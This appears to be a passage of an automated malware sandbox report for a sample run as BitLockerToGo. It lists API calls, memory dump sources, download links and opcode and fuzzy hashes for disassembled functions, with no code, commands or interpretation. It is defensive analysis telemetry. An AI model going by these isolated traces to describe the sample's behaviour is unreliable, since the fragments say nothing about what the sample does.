                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$CloseCreateHandleSize
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1378416451-0
                                                                                                                                                                • Opcode ID: 3c6699706fab5e06ba0c609676607ddd769b7dcce9de1e229c28d9186bfc4c81
                                                                                                                                                                • Instruction ID: 59752f01b2bc483ab39f03c126985d24ec211e86213cb1113a61a98ab12108ba
                                                                                                                                                                • Opcode Fuzzy Hash: 3c6699706fab5e06ba0c609676607ddd769b7dcce9de1e229c28d9186bfc4c81
                                                                                                                                                                • Instruction Fuzzy Hash: 62F04F39E80208BBDB20EFB0ED59F9E77F9AB48710F10C694B651AB2C4D77496118B84
                                                                                                                                                                APIs
                                                                                                                                                                • CreateDCA.GDI32(03540598,00000000,00000000,00000000), ref: 030011E2
                                                                                                                                                                • GetDeviceCaps.GDI32(?,0000000A), ref: 030011F1
                                                                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 03001200
                                                                                                                                                                • ExitProcess.KERNEL32 ref: 03001211
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CapsCreateDeviceExitProcessRelease
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 272768826-0
                                                                                                                                                                • Opcode ID: d1deb68dd87825093a56777f1fb2a80f66ca4e9e50537ef4f6c811dd1922a9bc
                                                                                                                                                                • Instruction ID: f347f31b27b7e9e3d1f95de180f1bcb9cf0c8b2e49cb570b8b6f46f081213f01
                                                                                                                                                                • Opcode Fuzzy Hash: d1deb68dd87825093a56777f1fb2a80f66ca4e9e50537ef4f6c811dd1922a9bc
                                                                                                                                                                • Instruction Fuzzy Hash: 40F0C97DA80308BBE710ABA0F94EB6D7BB8EB44702F10C194FA05A62C4D7B559018B91
                                                                                                                                                                APIs
                                                                                                                                                                • moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6CCC85D3
                                                                                                                                                                  • Part of subcall function 6CC8CA10: malloc.MOZGLUE(?), ref: 6CC8CA26
                                                                                                                                                                • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6CCC8725
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Xlength_error@std@@mallocmoz_xmalloc
                                                                                                                                                                • String ID: map/set<T> too long
                                                                                                                                                                • API String ID: 3720097785-1285458680
                                                                                                                                                                • Opcode ID: d589d11aba9d739d9fc8fee6ec23adebe3d313c4c19a7aa533cb39aeb17463db
                                                                                                                                                                • Instruction ID: a33a427a6569307da1e5f5ff68f813bf1844aa8191489bae652df73eb0783b73
                                                                                                                                                                • Opcode Fuzzy Hash: d589d11aba9d739d9fc8fee6ec23adebe3d313c4c19a7aa533cb39aeb17463db
                                                                                                                                                                • Instruction Fuzzy Hash: 05515474A00641CFD701CF28C184E5ABBF1BF4A318F19C29AD8595BB52E375E885CF92
                                                                                                                                                                APIs
                                                                                                                                                                • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6CC7BDEB
                                                                                                                                                                • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6CC7BE8F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                                                                                                                                • String ID: 0
                                                                                                                                                                • API String ID: 2811501404-4108050209
                                                                                                                                                                • Opcode ID: ea964a2acdca65a35f75a25b766a8c2d4e0e5c08c0e67b8b5ba5fb2363254dfd
                                                                                                                                                                • Instruction ID: ea55a111c9eba7f7295fb63e1b6f822da59cdad0033443309224003c217b112f
                                                                                                                                                                • Opcode Fuzzy Hash: ea964a2acdca65a35f75a25b766a8c2d4e0e5c08c0e67b8b5ba5fb2363254dfd
                                                                                                                                                                • Instruction Fuzzy Hash: 3C41AD71909745CFC321CF29C491A9BBBF4FF8A348F004A5DF985A7711E73099498BA2
                                                                                                                                                                APIs
                                                                                                                                                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CCB3D19
                                                                                                                                                                • mozalloc_abort.MOZGLUE(?), ref: 6CCB3D6C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _errnomozalloc_abort
                                                                                                                                                                • String ID: d
                                                                                                                                                                • API String ID: 3471241338-2564639436
                                                                                                                                                                • Opcode ID: 207fa8a50464b1dbcabb5099af3ccb31210311acc99e55e77e11862bdb14d635
                                                                                                                                                                • Instruction ID: d83840c44f9f115a8282b936ec7ff495b1941f3f22b52eb3bb0e5c0d28160248
                                                                                                                                                                • Opcode Fuzzy Hash: 207fa8a50464b1dbcabb5099af3ccb31210311acc99e55e77e11862bdb14d635
                                                                                                                                                                • Instruction Fuzzy Hash: 1B11C435E14788D7DB009BA9CC144EDB775EF9A318B488259DC55AB602FF30A9C4C350
                                                                                                                                                                APIs
                                                                                                                                                                • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6CCD6E22
                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 6CCD6E3F
                                                                                                                                                                Strings
                                                                                                                                                                • MOZ_DISABLE_WALKTHESTACK, xrefs: 6CCD6E1D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Init_thread_footergetenv
                                                                                                                                                                • String ID: MOZ_DISABLE_WALKTHESTACK
                                                                                                                                                                • API String ID: 1472356752-1153589363
                                                                                                                                                                • Opcode ID: 6ee4520b31715c4ac42c768049189953f1ee4be68615e58c19b4ef7d871f29d4
                                                                                                                                                                • Instruction ID: 65b4c8811af38275a90a7d6e74bc7b6d0a037f6f613148b2b0c36f1c09455c9d
                                                                                                                                                                • Opcode Fuzzy Hash: 6ee4520b31715c4ac42c768049189953f1ee4be68615e58c19b4ef7d871f29d4
                                                                                                                                                                • Instruction Fuzzy Hash: 20F024702046428FDB008B68E894A8933B1EF53218F250565C56087F51FBA1F507CA93
                                                                                                                                                                APIs
                                                                                                                                                                • DisableThreadLibraryCalls.KERNEL32(?), ref: 6CC8BEE3
                                                                                                                                                                • LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6CC8BEF5
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Library$CallsDisableLoadThread
                                                                                                                                                                • String ID: cryptbase.dll
                                                                                                                                                                • API String ID: 4137859361-1262567842
                                                                                                                                                                • Opcode ID: f9990b94679915fddfbeb613820a1e0c6e9368d32216bcd47a51cc970cec8952
                                                                                                                                                                • Instruction ID: 51eb74b39b279c2edcb62c4e9a656aec12c139380d6b7cb976b3ae124461e668
                                                                                                                                                                • Opcode Fuzzy Hash: f9990b94679915fddfbeb613820a1e0c6e9368d32216bcd47a51cc970cec8952
                                                                                                                                                                • Instruction Fuzzy Hash: B7D023311C1108EFCB40AB50DD15F163F74AF01319F10C020F33544951D7B09410CF50
                                                                                                                                                                APIs
                                                                                                                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6CCCB2C9,?,?,?,6CCCB127,?,?,?,?,?,?,?,?,?,6CCCAE52), ref: 6CCCB628
                                                                                                                                                                  • Part of subcall function 6CCC90E0: free.MOZGLUE(?,00000000,?,?,6CCCDEDB), ref: 6CCC90FF
                                                                                                                                                                  • Part of subcall function 6CCC90E0: free.MOZGLUE(?,00000000,?,?,6CCCDEDB), ref: 6CCC9108
                                                                                                                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6CCCB2C9,?,?,?,6CCCB127,?,?,?,?,?,?,?,?,?,6CCCAE52), ref: 6CCCB67D
                                                                                                                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6CCCB2C9,?,?,?,6CCCB127,?,?,?,?,?,?,?,?,?,6CCCAE52), ref: 6CCCB708
                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6CCCB127,?,?,?,?,?,?,?,?), ref: 6CCCB74D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: freemalloc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3061335427-0
                                                                                                                                                                • Opcode ID: 4159a15b61a14dfdd5f532815638e826078ac5070ff68ef7518249a195d1f46f
                                                                                                                                                                • Instruction ID: e5a6f15e28e8e74e27fe566a31866ecb90f852f11d266f03835f7a4c13becf4e
                                                                                                                                                                • Opcode Fuzzy Hash: 4159a15b61a14dfdd5f532815638e826078ac5070ff68ef7518249a195d1f46f
                                                                                                                                                                • Instruction Fuzzy Hash: 0951CFB1B052168BDB18CF98C99475EB7B5FF45305F058529CC5AABB00EB31E815CBA2
                                                                                                                                                                APIs
                                                                                                                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6CC80A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CCDB5EA
                                                                                                                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6CC80A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CCDB623
                                                                                                                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6CC80A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CCDB66C
                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,6CC80A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CCDB67F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: malloc$free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1480856625-0
                                                                                                                                                                • Opcode ID: 28fbd66ad54a0a51b9b0816ee60ff83887573011608c4112bd4848534ed1485f
                                                                                                                                                                • Instruction ID: e1c7b259aa07fe7c86ba5319d1702407e3d188a2b9312d2eb9ae14e6e90da9f3
                                                                                                                                                                • Opcode Fuzzy Hash: 28fbd66ad54a0a51b9b0816ee60ff83887573011608c4112bd4848534ed1485f
                                                                                                                                                                • Instruction Fuzzy Hash: 2F31F471A002168FDB18CF58C85465ABBF5FF80304F17856AE9169B301EB31F917CBA0
                                                                                                                                                                APIs
                                                                                                                                                                • memcpy.VCRUNTIME140(?,?,00010000), ref: 6CCAF611
                                                                                                                                                                • memcpy.VCRUNTIME140(?,?,?), ref: 6CCAF623
                                                                                                                                                                • memcpy.VCRUNTIME140(?,?,00010000), ref: 6CCAF652
                                                                                                                                                                • memcpy.VCRUNTIME140(?,?,?), ref: 6CCAF668
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3510742995-0
                                                                                                                                                                • Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                                                                                                • Instruction ID: 18e64db2c1078356a97ed78d2a646d539cc08aee149ab690dbfa03d2039b17f5
                                                                                                                                                                • Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                                                                                                • Instruction Fuzzy Hash: 2C315171A00215AFC714CF5ECCC4A9F7BB6FF88354B148539FA498BB14E671E9458B90